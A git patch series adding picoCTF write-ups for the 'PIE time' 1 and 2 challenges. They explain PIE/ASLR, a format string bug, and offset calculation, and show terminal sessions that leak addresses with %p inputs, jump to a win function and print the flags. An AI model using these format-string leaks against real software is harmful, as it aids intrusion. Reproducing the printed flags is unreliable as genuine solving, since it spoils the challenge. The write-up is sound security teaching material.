a/picoctf/binary_exploit/pie_time12/pie_time1/vuln_dump.txt b/picoctf/binary_exploit/pie_time1/vuln_dump.txt similarity index 99% rename from picoctf/binary_exploit/pie_time12/pie_time1/vuln_dump.txt rename to picoctf/binary_exploit/pie_time1/vuln_dump.txt index 57e5f2c..acb4207 100644 --- a/picoctf/binary_exploit/pie_time12/pie_time1/vuln_dump.txt +++ b/picoctf/binary_exploit/pie_time1/vuln_dump.txt @@ -1,3 +1,5 @@ +//Objdumped vuln: +// objdump -d vuln vuln: file format elf64-x86-64 diff --git a/picoctf/binary_exploit/pie_time12/writeup.md b/picoctf/binary_exploit/pie_time1/writeup.md similarity index 100% rename from picoctf/binary_exploit/pie_time12/writeup.md rename to picoctf/binary_exploit/pie_time1/writeup.md diff --git a/picoctf/binary_exploit/pie_time12/pie_time2/vuln b/picoctf/binary_exploit/pie_time2/vuln similarity index 100% rename from picoctf/binary_exploit/pie_time12/pie_time2/vuln rename to picoctf/binary_exploit/pie_time2/vuln diff --git a/picoctf/binary_exploit/pie_time12/pie_time2/vuln.c b/picoctf/binary_exploit/pie_time2/vuln.c similarity index 100% rename from picoctf/binary_exploit/pie_time12/pie_time2/vuln.c rename to picoctf/binary_exploit/pie_time2/vuln.c diff --git a/picoctf/binary_exploit/pie_time12/pie_time2/vuln_dump.txt b/picoctf/binary_exploit/pie_time2/vuln_dump.txt similarity index 99% rename from picoctf/binary_exploit/pie_time12/pie_time2/vuln_dump.txt rename to picoctf/binary_exploit/pie_time2/vuln_dump.txt index e046207..d389255 100644 --- a/picoctf/binary_exploit/pie_time12/pie_time2/vuln_dump.txt +++ b/picoctf/binary_exploit/pie_time2/vuln_dump.txt @@ -1,3 +1,6 @@ +//Objdumped vuln: +// objdump -d vuln + vuln: file format elf64-x86-64 diff --git a/picoctf/binary_exploit/pie_time2/writeup.md b/picoctf/binary_exploit/pie_time2/writeup.md new file mode 100644 index 0000000..b7c79dd --- /dev/null +++ b/picoctf/binary_exploit/pie_time2/writeup.md @@ -0,0 +1,139 @@ +# PicoCTF: PIE time 1 and 2 + +## Context (both levels) + +We are provided with a compiled binary and the source code for each level, as well as a complimentary server and port to connect to via netcat. We only connect via netcat when we are ready to get the flag. The executable's details for each level will be explained below. + +## Background Information: PIE executables and format string vulnerabilities + +Executables can come in different forms, notably PIE (position independent executable) and no-PIE. If we compile a PIE executable, it means that that whole chunk of code for the program can be placed anywhere in memory. This enables ASLR (address space layout randomization) which randomizes the memory address of key components of our program, like where its stack, heap, etc. begin. A no-PIE executable's code will be placed at a fixed address. That means that we cannot use ASLR. + +Below, I've provided examples of objdumped PIE and no-PIE executables. Note how the no-PIE executable starts at address 0x401000, while the PIE executable starts at 0x1000 so it's able to placed at a random memory address later. + +``` text +mms2379@spoc:~/temp/studying/linking2$ objdump -d main-no-pie + +main-no-pie: file format elf64-x86-64 + + +Disassembly of section .init: + +0000000000401000 <_init>: + 401000: f3 0f 1e fa endbr64 + 401004: 48 83 ec 08 sub $0x8,%rsp + 401008: 48 8b 05 e9 2f 00 00 mov 0x2fe9(%rip),%rax # 403ff8 <__gmon_start__@Base> + 40100f: 48 85 c0 test %rax,%rax + 401012: 74 02 je 401016 <_init+0x16> + 401014: ff d0 call *%rax + 401016: 48 83 c4 08 add $0x8,%rsp + 40101a: c3 ret +... + +``` + +```text +mms2379@spoc:~/temp/studying/linking2$ objdump -d main-dyn + +main-dyn: file format elf64-x86-64 + + +Disassembly of section .init: + +0000000000001000 <_init>: + 1000: f3 0f 1e fa endbr64 + 1004: 48 83 ec 08 sub $0x8,%rsp + 1008: 48 8b 05 d9 2f 00 00 mov 0x2fd9(%rip),%rax # 3fe8 <__gmon_start__@Base> + 100f: 48 85 c0 test %rax,%rax + 1012: 74 02 je 1016 <_init+0x16> + 1014: ff d0 call *%rax + 1016: 48 83 c4 08 add $0x8,%rsp + 101a: c3 ret + ... + +``` + +A format string vulnerability takes advantage of C's `printf(...)` to leak memory addresses. For example, if a program asks for user input and then prints that input back to the user using `printf(...)`, the user can supply a format string (`%s`, `%lx`, `%p`, etc.) so that their provided information gets printed in that form. Note that this is only possible when the `printf(...)` function **does not** already have a format string specifier. See the example below from OWASP. + +``` C +#include +void main(int argc, char **argv) +{ + // This line is safe + printf("%s\n", argv[1]); + + // This line is vulnerable + printf(argv[1]); +} +``` +`./example "Hello World %p %p %p %p %p %p"` will result in: `Hello World 000E133E 000E133E 0057F000 CCCCCCCC CCCCCCCC CCCCCCCC`. + +## Vulnerability (level 1) + +When we do `./vuln` we are prompted to enter an address. If the address is not correct, we segfault: +```text +mms2379@spoc:~/ctf/pie_time$ ./vuln +Address of main: 0x58e94163433d +Enter the address to jump to, ex => 0x12345: 0x0 +Your input: 0 +Segfault Occurred, incorrect address. +``` +Note that we are given the address of the `main` function. We may take a closer look at the source code. We see that we have a `main()` function and a `win` function that is not called anywhere in the program. We also see that `win` will give us our flag. Full source code can be found in `pie_time1/vuln.c`. +```C +int win() { + FILE *fptr; + char c; + + printf("You won!\n"); + // Open file + fptr = fopen("flag.txt", "r"); + if (fptr == NULL) + { + printf("Cannot open file.\n"); + exit(0); + } + + // Read contents from file + c = fgetc(fptr); + while (c != EOF) + { + printf ("%c", c); + c = fgetc(fptr); + } + + printf("\n"); + fclose(fptr); +} + +int main() { + signal(SIGSEGV, segfault_handler); + setvbuf(stdout, NULL, _IONBF, 0); // _IONBF = Unbuffered + ... +``` +Therefore, we conclude that we must somehow call the `win` function in order to get our flag. If this were a no-PIE exectuable, then we could just enter the address of the `win` function. Unfortunatley, `vuln` is a PIE executable: + +``` +mms2379@spoc:~/ctf/pie_time$ file vuln +vuln: ELF 64-bit LSB pie executable, x86-64, version 1 (SYSV), dynamically linked, interpreter /lib64/ld-linux-x86-64.so.2, BuildID[sha1]=0072413e1b5a0613219f45518ded05fc685b680a, for GNU/Linux 3.2.0, not stripped +``` + + + +## Exploitation (level 1) + + + +## Vulnerability (level 2) + + +## Exploitation (level 2) + + +## Remediation + + + +# Sources/Credits + +Written by Madalina Stoicov + +- https://owasp.org/www-community/attacks/Format_string_attack From ea924dcfe928b77f737a84222efe294d9bc1db34 Mon Sep 17 00:00:00 2001 From: Madalina Stoicov <156598074+mmstoic@users.noreply.github.com> Date: Sun, 11 May 2025 20:55:47 -0400 Subject: [PATCH 4/9] Update writeup.md --- picoctf/binary_exploit/pie_time1/writeup.md | 58 ++++++++++++++++----- 1 file changed, 45 insertions(+), 13 deletions(-) diff --git a/picoctf/binary_exploit/pie_time1/writeup.md b/picoctf/binary_exploit/pie_time1/writeup.md index b7c79dd..6cd4162 100644 --- a/picoctf/binary_exploit/pie_time1/writeup.md +++ b/picoctf/binary_exploit/pie_time1/writeup.md @@ -1,8 +1,17 @@ -# PicoCTF: PIE time 1 and 2 +# PicoCTF: PIE time 1 -## Context (both levels) +## Context -We are provided with a compiled binary and the source code for each level, as well as a complimentary server and port to connect to via netcat. We only connect via netcat when we are ready to get the flag. The executable's details for each level will be explained below. +We are provided with a compiled binary and the source code (`vuln` and `vuln.c`), as well as a complimentary server and port to connect to via netcat. We only connect via netcat when we are ready to get the flag. + +When we do `./vuln` we are prompted to enter an address. If the address is not correct, we segfault: +```text +mms2379@spoc:~/ctf/pie_time$ ./vuln +Address of main: 0x58e94163433d +Enter the address to jump to, ex => 0x12345: 0x0 +Your input: 0 +Segfault Occurred, incorrect address. +``` ## Background Information: PIE executables and format string vulnerabilities @@ -67,9 +76,10 @@ void main(int argc, char **argv) ``` `./example "Hello World %p %p %p %p %p %p"` will result in: `Hello World 000E133E 000E133E 0057F000 CCCCCCCC CCCCCCCC CCCCCCCC`. -## Vulnerability (level 1) +## Vulnerability + +Recall that we are prompted to enter an address: -When we do `./vuln` we are prompted to enter an address. If the address is not correct, we segfault: ```text mms2379@spoc:~/ctf/pie_time$ ./vuln Address of main: 0x58e94163433d @@ -77,7 +87,9 @@ Enter the address to jump to, ex => 0x12345: 0x0 Your input: 0 Segfault Occurred, incorrect address. ``` -Note that we are given the address of the `main` function. We may take a closer look at the source code. We see that we have a `main()` function and a `win` function that is not called anywhere in the program. We also see that `win` will give us our flag. Full source code can be found in `pie_time1/vuln.c`. + +Note that we are given the address of the `main` function. We may take a closer look at the source code. We see that we have a `main()` function and a `win` function that is not called anywhere in the program. We also see that `win` will give us our flag. (Full source code can be found in `pie_time1/vuln.c`) + ```C int win() { FILE *fptr; @@ -109,6 +121,7 @@ int main() { setvbuf(stdout, NULL, _IONBF, 0); // _IONBF = Unbuffered ... ``` + Therefore, we conclude that we must somehow call the `win` function in order to get our flag. If this were a no-PIE exectuable, then we could just enter the address of the `win` function. Unfortunatley, `vuln` is a PIE executable: ``` @@ -116,21 +129,40 @@ mms2379@spoc:~/ctf/pie_time$ file vuln vuln: ELF 64-bit LSB pie executable, x86-64, version 1 (SYSV), dynamically linked, interpreter /lib64/ld-linux-x86-64.so.2, BuildID[sha1]=0072413e1b5a0613219f45518ded05fc685b680a, for GNU/Linux 3.2.0, not stripped ``` +This means that we will have to calculate the address of `win` based on some other address. Recall that we are given the address of `main`. Therefore, we conclude that we must use the address at `main` to call `win`. +## Exploitation -## Exploitation (level 1) - - - -## Vulnerability (level 2) +Taking a look at the disassembly of `vuln`, we can manually calculate the distance in memory between `win` and `main`. (See `pie_time1/vuln_dump.txt` for the full disassembly) +```text +00000000000012a7 : + 12a7: f3 0f 1e fa endbr64 + 12ab: 55 push %rbp + 12ac: 48 89 e5 mov %rsp,%rbp + ... + +000000000000133d
: + 133d: f3 0f 1e fa endbr64 + 1341: 55 push %rbp + 1342: 48 89 e5 mov %rsp,%rbp + ... +``` -## Exploitation (level 2) +The difference in hex between 0x12a7 and 0x133d is 0x96. So now, every time we execute `vuln` and get our address for `main`, we may simply calculate `main` - 0x96 = address to jump to: +```text +mms2379@spoc:~/ctf/pie_time$ nc rescued-float.picoctf.net 54738 +Address of main: 0x5bee3664233d +Enter the address to jump to, ex => 0x12345: 0x5bee366422a7 +Your input: 5bee366422a7 +You won! +picoCTF{b4s1c_p051t10n_1nd3p3nd3nc3_a267144a} +``` ## Remediation - +The remediation for this is pretty simple: don't give out addresses in PIE executables! The whole point of PIE is to enable ASLR and make it **harder** to infiltrate, but by providing a reference address and source code, it can be easy to calculate the addresses of other functions and get to whatever function you'd like. # Sources/Credits From 1d409418b04c4fcdc1cab29e08a7283305658d60 Mon Sep 17 00:00:00 2001 From: Madalina Stoicov <156598074+mmstoic@users.noreply.github.com> Date: Sun, 11 May 2025 20:56:56 -0400 Subject: [PATCH 5/9] Update writeup.md --- picoctf/binary_exploit/pie_time1/writeup.md | 3 ++- 1 file changed, 2 insertions(+), 1 deletion(-) diff --git a/picoctf/binary_exploit/pie_time1/writeup.md b/picoctf/binary_exploit/pie_time1/writeup.md index 6cd4162..8dba610 100644 --- a/picoctf/binary_exploit/pie_time1/writeup.md +++ b/picoctf/binary_exploit/pie_time1/writeup.md @@ -168,4 +168,5 @@ The remediation for this is pretty simple: don't give out addresses in PIE execu Written by Madalina Stoicov -- https://owasp.org/www-community/attacks/Format_string_attack +- https://owasp.org/www-community/attacks/Format_string_attack +- https://cs4157.github.io/www/2025-1/lect/17-linking-2.html From cb5f48483553fa765e42d4894d8ccd1917db6910 Mon Sep 17 00:00:00 2001 From: Madalina Stoicov <156598074+mmstoic@users.noreply.github.com> Date: Sun, 11 May 2025 21:01:02 -0400 Subject: [PATCH 6/9] Update writeup.md --- picoctf/binary_exploit/pie_time1/writeup.md | 18 +----------------- 1 file changed, 1 insertion(+), 17 deletions(-) diff --git a/picoctf/binary_exploit/pie_time1/writeup.md b/picoctf/binary_exploit/pie_time1/writeup.md index 8dba610..974ed9a 100644 --- a/picoctf/binary_exploit/pie_time1/writeup.md +++ b/picoctf/binary_exploit/pie_time1/writeup.md @@ -13,7 +13,7 @@ Your input: 0 Segfault Occurred, incorrect address. ``` -## Background Information: PIE executables and format string vulnerabilities +## Background Information: PIE executables Executables can come in different forms, notably PIE (position independent executable) and no-PIE. If we compile a PIE executable, it means that that whole chunk of code for the program can be placed anywhere in memory. This enables ASLR (address space layout randomization) which randomizes the memory address of key components of our program, like where its stack, heap, etc. begin. A no-PIE executable's code will be placed at a fixed address. That means that we cannot use ASLR. @@ -61,21 +61,6 @@ Disassembly of section .init: ``` -A format string vulnerability takes advantage of C's `printf(...)` to leak memory addresses. For example, if a program asks for user input and then prints that input back to the user using `printf(...)`, the user can supply a format string (`%s`, `%lx`, `%p`, etc.) so that their provided information gets printed in that form. Note that this is only possible when the `printf(...)` function **does not** already have a format string specifier. See the example below from OWASP. - -``` C -#include -void main(int argc, char **argv) -{ - // This line is safe - printf("%s\n", argv[1]); - - // This line is vulnerable - printf(argv[1]); -} -``` -`./example "Hello World %p %p %p %p %p %p"` will result in: `Hello World 000E133E 000E133E 0057F000 CCCCCCCC CCCCCCCC CCCCCCCC`. - ## Vulnerability Recall that we are prompted to enter an address: @@ -168,5 +153,4 @@ The remediation for this is pretty simple: don't give out addresses in PIE execu Written by Madalina Stoicov -- https://owasp.org/www-community/attacks/Format_string_attack - https://cs4157.github.io/www/2025-1/lect/17-linking-2.html From 01d7c3b6382d3124cb50b06c701ffd4b668360f3 Mon Sep 17 00:00:00 2001 From: Madalina Stoicov <156598074+mmstoic@users.noreply.github.com> Date: Sun, 11 May 2025 21:31:31 -0400 Subject: [PATCH 7/9] Update writeup.md --- picoctf/binary_exploit/pie_time2/writeup.md | 132 +++++++++++++------- 1 file changed, 87 insertions(+), 45 deletions(-) diff --git a/picoctf/binary_exploit/pie_time2/writeup.md b/picoctf/binary_exploit/pie_time2/writeup.md index b7c79dd..a1e62d4 100644 --- a/picoctf/binary_exploit/pie_time2/writeup.md +++ b/picoctf/binary_exploit/pie_time2/writeup.md @@ -1,8 +1,17 @@ -# PicoCTF: PIE time 1 and 2 +# PicoCTF: PIE time 2 -## Context (both levels) +## Context -We are provided with a compiled binary and the source code for each level, as well as a complimentary server and port to connect to via netcat. We only connect via netcat when we are ready to get the flag. The executable's details for each level will be explained below. +We are provided with a compiled binary and the source code (`vuln` and `vuln.c`), as well as a complimentary server and port to connect to via netcat. We only connect via netcat when we are ready to get the flag. + +When we do `./vuln` we are prompted to enter a name and then an address. If the address is not correct, we segfault: +```text +mms2379@spoc:~/ctf/pie_time2$ ./vuln +Enter your name:name +name + enter the address to jump to, ex => 0x12345: 0x0 +Segfault Occurred, incorrect address. +``` ## Background Information: PIE executables and format string vulnerabilities @@ -67,73 +76,106 @@ void main(int argc, char **argv) ``` `./example "Hello World %p %p %p %p %p %p"` will result in: `Hello World 000E133E 000E133E 0057F000 CCCCCCCC CCCCCCCC CCCCCCCC`. -## Vulnerability (level 1) +## Vulnerability + +Recall that we are asked to enter a name when we start the program. Let's take a closer look at the source code to see how we parse this user input. (See the full source code at `pie_time2/vuln.c`). We see that `main` calls `call_functions`, which does the user input handling: -When we do `./vuln` we are prompted to enter an address. If the address is not correct, we segfault: -```text -mms2379@spoc:~/ctf/pie_time$ ./vuln -Address of main: 0x58e94163433d -Enter the address to jump to, ex => 0x12345: 0x0 -Your input: 0 -Segfault Occurred, incorrect address. -``` -Note that we are given the address of the `main` function. We may take a closer look at the source code. We see that we have a `main()` function and a `win` function that is not called anywhere in the program. We also see that `win` will give us our flag. Full source code can be found in `pie_time1/vuln.c`. ```C -int win() { - FILE *fptr; - char c; - - printf("You won!\n"); - // Open file - fptr = fopen("flag.txt", "r"); - if (fptr == NULL) - { - printf("Cannot open file.\n"); - exit(0); - } - - // Read contents from file - c = fgetc(fptr); - while (c != EOF) - { - printf ("%c", c); - c = fgetc(fptr); - } - - printf("\n"); - fclose(fptr); +void call_functions() { + char buffer[64]; + printf("Enter your name:"); + fgets(buffer, 64, stdin); + printf(buffer); + + unsigned long val; + printf(" enter the address to jump to, ex => 0x12345: "); + scanf("%lx", &val); + + void (*foo)(void) = (void (*)())val; + foo(); } +... + int main() { signal(SIGSEGV, segfault_handler); setvbuf(stdout, NULL, _IONBF, 0); // _IONBF = Unbuffered - ... + + call_functions(); + return 0; +} ``` -Therefore, we conclude that we must somehow call the `win` function in order to get our flag. If this were a no-PIE exectuable, then we could just enter the address of the `win` function. Unfortunatley, `vuln` is a PIE executable: + +In particular, we notice that `printf` looks a little strange: it has no format specifier. My installed Clangd helped me get some information about this: + +[image here] + +We identify this as a format string vulnerability that may help us get more information. Notably, since we also aren't given the address of main like in PIE time 1, we may be able to use this to get more information about the run-time addresses of `vuln`. + +## Exploitation + +I decided to use OWASP's format string vulnerability example on `vuln`: ``` -mms2379@spoc:~/ctf/pie_time$ file vuln -vuln: ELF 64-bit LSB pie executable, x86-64, version 1 (SYSV), dynamically linked, interpreter /lib64/ld-linux-x86-64.so.2, BuildID[sha1]=0072413e1b5a0613219f45518ded05fc685b680a, for GNU/Linux 3.2.0, not stripped +mms2379@spoc:~/ctf/pie_time2$ ./vuln +Enter your name:%p %p +0x70252070 0xfbad2288 + enter the address to jump to, ex => 0x12345: 0x0 +Segfault Occurred, incorrect address. ``` +Indeed, we may use this to get some more information. However, we need to know what address we're looking for ahead of time. I headed to `vuln`'s disassembly for more information. (See the full disassembly at `pie_time2/vuln_dump.txt`) +``` +0000000000001400
: + 1400: f3 0f 1e fa endbr64 + 1404: 55 push %rbp + 1405: 48 89 e5 mov %rsp,%rbp + ... + 143c: e8 86 fe ff ff call 12c7 + 1441: b8 00 00 00 00 mov $0x0,%eax + 1446: 5d pop %rbp + 1447: c3 ret + 1448: 0f 1f 84 00 00 00 00 nopl 0x0(%rax,%rax,1) + 144f: 00 +``` -## Exploitation (level 1) - +`main` starts at 0x1400 and calls `call_functions` at 0x143c, and the line right after the function call is at 0x1441. Therefore, I decided to look for addresses that might end in these numbers. +``` +mms2379@spoc:~/ctf/pie_time2$ ./vuln +Enter your name:%p %p %p %p %p %p %p %p %p %p %p %p %p %p %p %p %p %p %p %p +0x600f8ae552a1 0xfbad2288 0x600f8ae552dc (nil) 0x600f8ae552a0 (nil) 0x70f4a581b780 0x7025207025207025 0x2520702520702520 0x2070252070252070 0x7025207025207025 0x2520702520702520 0x2070252070252070 0x7025207025207025 0x7f000a702520 0x7ffdd74ed6e8 0xc6ffdfe5a02e6b00 0x7ffdd74ed5d0 0x600f50bea441 0x1 + enter the address to jump to, ex => 0x12345: 0x0 +Segfault Occurred, incorrect address. +``` -## Vulnerability (level 2) +After printing some more addresses (20, to be exact), I see this address: 0x600f50bea441. This matches the address of the line directly after the `call_functions` call, and it is not as large as the other numbers, so it's likely not a stack address. Let's calculate the difference between 0x1441 and the top of the `win` function: 0x1441 - 0x136a = 0xd7. On the next run of the program, let's try doing the address at the 19th `%p` - 0xd7 to see if that gets us to `win`: +``` +mms2379@spoc:~/ctf/pie_time2$ nc rescued-float.picoctf.net 62828 +Enter your name:%p %p %p %p %p %p %p %p %p %p %p %p %p %p %p %p %p %p %p %p +0x5a1c306e92a1 (nil) 0x5a1c306e92dd 0x7fffa2f42b10 0x7c 0x7fffa2f86228 0x760d6012a6a0 0x7025207025207025 0x2520702520702520 0x2070252070252070 0x7025207025207025 0x2520702520702520 0x2070252070252070 0x7025207025207025 0xa20702520 0x5a1c2f1541c0 0x24da89febb514f00 0x7fffa2f42b70 0x5a1c2f154441 (nil) +``` -## Exploitation (level 2) +We do: 0x5a1c2f154441 - 0xd7 = 0x5a1c2f15436a +``` +mms2379@spoc:~/ctf/pie_time2$ nc rescued-float.picoctf.net 62828 +Enter your name:%p %p %p %p %p %p %p %p %p %p %p %p %p %p %p %p %p %p %p %p +0x5a1c306e92a1 (nil) 0x5a1c306e92dd 0x7fffa2f42b10 0x7c 0x7fffa2f86228 0x760d6012a6a0 0x7025207025207025 0x2520702520702520 0x2070252070252070 0x7025207025207025 0x2520702520702520 0x2070252070252070 0x7025207025207025 0xa20702520 0x5a1c2f1541c0 0x24da89febb514f00 0x7fffa2f42b70 0x5a1c2f154441 (nil) + enter the address to jump to, ex => 0x12345: 0x5a1c2f15436a +You won! +picoCTF{p13_5h0u1dn'7_134k_2509623b} +``` ## Remediation - +The big vulnerability here is the format string vulnerability. It allowed us to leak addresses and therefore go to other functions with some simple calculations. Always use format specifiers in your `printf` statements! # Sources/Credits Written by Madalina Stoicov +- https://cs4157.github.io/www/2025-1/lect/17-linking-2.html - https://owasp.org/www-community/attacks/Format_string_attack From 978223aca12d7ab59e79cfdd2fc531c3c4d0387c Mon Sep 17 00:00:00 2001 From: Madalina Date: Sun, 11 May 2025 21:33:35 -0400 Subject: [PATCH 8/9] Add image --- .../pie_time2/pie_time2_images/clangd_out.png | Bin 0 -> 94607 bytes 1 file changed, 0 insertions(+), 0 deletions(-) create mode 100644 picoctf/binary_exploit/pie_time2/pie_time2_images/clangd_out.png diff --git a/picoctf/binary_exploit/pie_time2/pie_time2_images/clangd_out.png b/picoctf/binary_exploit/pie_time2/pie_time2_images/clangd_out.png new file mode 100644 index 0000000000000000000000000000000000000000..7dd47133b69f8a94d2b8bc0eee9ad04f70770941 GIT binary patch literal 94607 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 